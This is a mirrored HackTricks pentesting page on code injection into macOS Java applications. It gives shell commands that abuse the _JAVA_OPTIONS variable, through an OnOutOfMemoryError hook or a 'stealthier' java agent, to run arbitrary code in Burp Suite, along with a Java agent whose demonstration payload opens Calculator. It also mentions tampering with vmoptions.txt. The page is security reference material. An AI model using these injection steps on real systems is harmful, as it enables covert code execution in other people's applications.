mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
66 lines
4.4 KiB
Markdown
66 lines
4.4 KiB
Markdown
|
# macOS Java apps Injection
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
|
||
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
|
||
|
|
</details>
|
||
|
|
|
||
|
|
## \_JAVA\_OPTIONS
|
||
|
|
|
||
|
|
The env variable **`_JAVA_OPTIONS`** can be used to inject arbitrary java parameters in the execution of a java compiled app:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
# Write your payload in a script called /tmp/payload.sh
|
||
|
|
export _JAVA_OPTIONS='-Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
|
||
|
|
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
||
|
|
```
|
||
|
|
|
||
|
|
However, that will trigger an error on the executed app, another more stealth way is to create a java agent and use:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
export _JAVA_OPTIONS='-javaagent:agent.jar'
|
||
|
|
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
|
||
|
|
```
|
||
|
|
|
||
|
|
Where the agent can be:
|
||
|
|
|
||
|
|
```java
|
||
|
|
import java.io.*;
|
||
|
|
import java.lang.instrument.*;
|
||
|
|
|
||
|
|
public class Hax {
|
||
|
|
public static void premain(String args, Instrumentation inst) {
|
||
|
|
try {
|
||
|
|
Process p = Runtime.getRuntime().exec("open -a Calculator");
|
||
|
|
}
|
||
|
|
catch (Exception err) {
|
||
|
|
err.printStackTrace();
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
## vmoptions.txt
|
||
|
|
|
||
|
|
This file support the specification of **Java params** when Java is executed. You could use some of the previous tricks to change the java params and **make the process execute arbitrary commands**.\
|
||
|
|
Moreover, this file can also include others, so you could also change an included file.
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
|
||
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
|
||
|
|
</details>
|